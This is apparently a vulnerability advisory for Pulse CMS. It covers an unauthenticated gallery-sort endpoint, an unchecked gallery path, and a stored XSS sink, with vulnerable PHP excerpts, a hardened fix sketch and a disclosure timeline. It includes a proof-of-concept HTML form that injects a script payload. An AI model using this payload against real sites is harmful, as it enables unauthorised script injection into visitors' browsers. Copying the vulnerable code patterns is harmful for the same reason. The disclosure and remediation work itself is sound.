login.php is not included in pulse\admin\inc\gal-sort.php, so the file can be
requested without any authentication.
As a result, anyone can control the content written to
../../content/media/". $gallery ."/gallery.txt.
File: pulse\admin\inc\gal-sort.php
if(!empty($_POST['gallery']) && !empty($_POST['one'])) {
    $gallery = $_POST['gallery'];   // taken straight from the request, no check on the name
    $order   = $_POST['one'];       // attacker-supplied gallery entries
    $taken   = array();
    $opFile  = "../../content/media/". $gallery ."/gallery.txt";
    $open    = fopen($opFile,"w");  // gallery.txt is overwritten with the submitted data
    if ($open) {
        // $new_data is derived from $order; its construction is omitted from this excerpt
        $data = fwrite($open, $new_data);
        fclose($open);
    }
}
Because the data from gallery.txt is echoed back unescaped when the gallery is
rendered, a stored XSS payload can be placed there.
File: pulse\inc\tags\gal.php
$opFile = "content/media/". $galdir ."/gallery.txt";
if (file_exists($opFile)) {
    $fp   = fopen($opFile,"r");
    $data = @fread($fp, filesize($opFile));
    fclose($fp);
    // one entry per line, fields separated by "|"
    $line = explode("\n", $data);
    foreach($line as $test){
        if(!empty($test)){
            $test_line[] = explode("|", $test);
        }
    }
    foreach ($test_line as $t){
        $image = "content/media/$galdir/".$t[0];
        $info  = pathinfo($image);
        $ext   = $info['extension'];
        if ($ext != 'txt' || empty($ext)){
            $taken[] = $image;
            // $t[2] (the title field from gallery.txt) is written into the HTML
            // attribute without escaping: this is the XSS sink
            echo "<a title='$t[2]' href='$image'><img src='inc/plugins/timthumb.php?src=$path/$image&h=$thumbnail_height&w=$thumbnail_width'></a>";
        }
    }
}
Proof of Concept
<form method="post" action="http://pulsecms-url/admin/inc/gal-sort.php">
    Gallery name: <input type="text" name="gallery">
    XSS: <input type="text" name="one[999]" value="'></a><script>alert("XSS");</script>">
    <input type="submit" value="Hack!">
</form>
The XSS payload is then rendered on every page where the gallery is displayed.
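For comparison, here is a hardened sketch of the two places shown above: the write path in gal-sort.php and the output loop in gal.php. This is an added example, not Pulse CMS code; the media root, the helper names and the require path for login.php are assumptions.

```php
<?php
// Added example (not Pulse CMS code). gal-sort.php: the missing auth include
// goes first, before any request parameter is touched. The path is an assumption:
//     require_once __DIR__ . '/../login.php';

// Return the gallery.txt path only for a plain directory name that really sits
// inside the media root, so $_POST['gallery'] can no longer pick the target.
function gallery_txt_path(string $mediaRoot, string $gallery): ?string
{
    // Letters, digits, dash, underscore only: no "..", slashes or NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $gallery)) {
        return null;
    }
    $root = realpath($mediaRoot);
    $dir  = realpath($mediaRoot . '/' . $gallery);
    if ($root === false || $dir === false || !is_dir($dir)
        || strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir . '/gallery.txt';
}

// gal.php: every field read from gallery.txt is escaped before it reaches HTML,
// and the file name loses any path component. $galdir, $h, $w mirror the page's
// $galdir, $thumbnail_height and $thumbnail_width.
function render_gallery_entry(array $t, string $galdir, int $h, int $w): string
{
    $file  = basename($t[0]);
    $title = $t[2] ?? '';
    $image = "content/media/$galdir/$file";
    $thumb = 'inc/plugins/timthumb.php?' . http_build_query(['src' => $image, 'h' => $h, 'w' => $w]);
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<a title='{$e($title)}' href='{$e($image)}'><img src='{$e($thumb)}'></a>";
}

// Constructed sample line: the payload from the proof of concept sits in the title field.
$line = "photo.jpg|1|'></a><script>alert(\"XSS\");</script>";
echo render_gallery_entry(explode('|', $line), 'summer', 120, 160), "\n";
// The quotes and angle brackets come out as &#039; &lt; &gt;, so the browser
// displays the text inside the title attribute instead of executing it.
```

With the escaping in place, the entry written by the proof-of-concept form is rendered as inert text; restricting the gallery name additionally keeps the write inside the media directory.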
Timeline
- 26-11-2014: Discovered
- 26-11-2014: Vendor notified
- 27-11-2014: Version 4.2.1 released, issue resolved